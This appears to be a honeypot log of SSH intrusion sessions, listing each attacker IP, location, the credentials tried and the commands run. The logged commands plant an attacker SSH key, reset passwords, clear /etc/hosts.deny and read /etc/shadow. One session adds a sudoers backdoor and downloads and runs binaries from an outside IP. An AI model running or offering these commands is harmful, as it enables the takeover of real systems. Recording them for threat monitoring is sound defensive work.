$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:4PV1ojhwOcx9"|chpasswd|bash
$ echo -e "1234\nzkToM9lqSC4V\nzkToM9lqSC4V"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nzkToM9lqSC4V\nzkToM9lqSC4V\n"|passwd
🎭 phantom_root_79 (136.248.247.188) β€” Santiago, Chile Β· 3 sessions Β· 58 cmds
2026-05-21 21:27 EDT Β· as mailuser/1234, root/Root123#, root/admin#1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:WRDQotXzGC2y"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "1234\ndUxmd28XPvbh\ndUxmd28XPvbh"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\ndUxmd28XPvbh\ndUxmd28XPvbh\n"|passwd
$ echo "root:3EVGeWii7WXw"|chpasswd|bash
🎭 sakura_root_6 (156.227.233.77) β€” Chiyoda City, Japan Β· 1 session Β· 20 cmds
2026-05-21 21:43 EDT Β· as tobi/tobi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "tobi\nqF8QLq6lJpPD\nqF8QLq6lJpPD"|passwd|bash
$ Enter new UNIX password:
$ echo "tobi\nqF8QLq6lJpPD\nqF8QLq6lJpPD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 frost_root_12 (80.253.31.232) β€” Moscow, Russia Β· 1 session Β· 19 cmds
2026-05-21 21:38 EDT Β· as root/Asdqwe123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:dems0gkmyLaW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cosmo_root_6 (89.253.254.13) β€” Moscow, Russia Β· 4 sessions Β· 4 cmds
2026-05-06 14:47 EDT Β· as root/blackcat, root/swissmp321*
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 cipher_root_68 (187.191.48.6) β€” Tijuana, Mexico Β· 1 session Β· 1 cmd
2026-05-21 21:22 EDT Β· as swissmp/swissmp@2024!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 chai_root_2 (168.220.237.171) β€” Mumbai, India Β· 2 sessions Β· 2 cmds
2026-05-21 07:46 EDT Β· as root/@swissmp@2024, root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 panda_root_26 (140.246.100.201) β€” Jinan, China Β· 1 session Β· 3 cmds
2026-05-21 21:10 EDT Β· as root/Root123#
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
🎭 lantern_root_28 (117.50.73.90) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-21 21:01 EDT Β· as root/9ol.0p;/
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:SeFC5Fg7eB9d"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 barbie_root_3 (58.6.206.239) β€” Melbourne, Australia Β· 1 session Β· 19 cmds
2026-05-21 20:59 EDT Β· as root/openvpnas
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:xYaVjcKuI5oq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_4 (193.90.12.62) β€” Trondheim, Norway Β· 1 session Β· 1 cmd
2026-05-21 20:54 EDT Β· as root/D8L}u3AynjJp{c"NY?]V4!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 |passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://103.56.149.224/cacti/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://103.56.149.224/cacti/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://103.56.149.224/cacti/oto -O /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://103.56.149.224/cacti/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto // password hash extraction
🎭 tiger_root_14 (123.58.203.202) β€” Mumbai, India Β· 2 sessions Β· 40 cmds
2026-05-21 20:27 EDT Β· as arjun/arjun123, nrk/nrk
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "arjun123\nQW1MRei2s1Zr\nQW1MRei2s1Zr"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "arjun123\nQW1MRei2s1Zr\nQW1MRei2s1Zr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "nrk\nCdyQOh7IdmBE\nCdyQOh7IdmBE"|passwd|bash
$ echo "nrk\nCdyQOh7IdmBE\nCdyQOh7IdmBE\n"|passwd
🎭 jade_root_18 (211.149.134.60) β€” Haidian, China Β· 1 session Β· 1 cmd
2026-05-21 20:41 EDT Β· as ubuntu/swissmp2026!!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_78 (196.188.187.45) β€” Addis Ababa, Ethiopia Β· 1 session Β· 20 cmds
2026-05-21 20:37 EDT Β· as arjun/arjun123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "arjun123\njjLDvKe1Tnwk\njjLDvKe1Tnwk"|passwd|bash
$ Enter new UNIX password:
$ echo "arjun123\njjLDvKe1Tnwk\njjLDvKe1Tnwk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_3 (14.103.117.69) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-21 20:33 EDT Β· as iman/iman
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "iman\nnkSMTekQQ0qb\nnkSMTekQQ0qb"|passwd|bash
$ Enter new UNIX password:
$ echo "iman\nnkSMTekQQ0qb\nnkSMTekQQ0qb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi_4 (222.107.254.30) β€” Seocho-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-21 20:22 EDT Β· as temp/temp1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "temp1234\nTBDdvwrfGzlQ\nTBDdvwrfGzlQ"|passwd|bash
$ Enter new UNIX password:
$ echo "temp1234\nTBDdvwrfGzlQ\nTBDdvwrfGzlQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 hanbok_root_13 (117.52.20.56) β€” Seongnam-si, South Korea Β· 2 sessions Β· 2 cmds
2026-05-21 06:27 EDT Β· as root/blackcat, root/swissmp@#@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 lotus_root_13 (182.18.161.165) β€” Hyderabad, India Β· 1 session Β· 19 cmds
2026-05-21 19:34 EDT Β· as root/Qq123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ozbTeYx7eG4F"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root (120.77.205.149) β€” Shenzhen, China Β· 1 session Β· 1 cmd
2026-05-21 19:15 EDT Β· as apache/apache123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 ramen_root_6 (20.243.208.191) β€” Tokyo, Japan Β· 2 sessions Β· 38 cmds
2026-05-21 18:54 EDT Β· as root/node2024, root/zxc,./123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:32SrVoLURWFj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:p3vFLrrATuxm"|chpasswd|bash
🎭 specter_root_79 (92.46.38.226) β€” Almaty, Kazakhstan Β· 1 session Β· 19 cmds
2026-05-21 18:52 EDT Β· as root/keypos
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
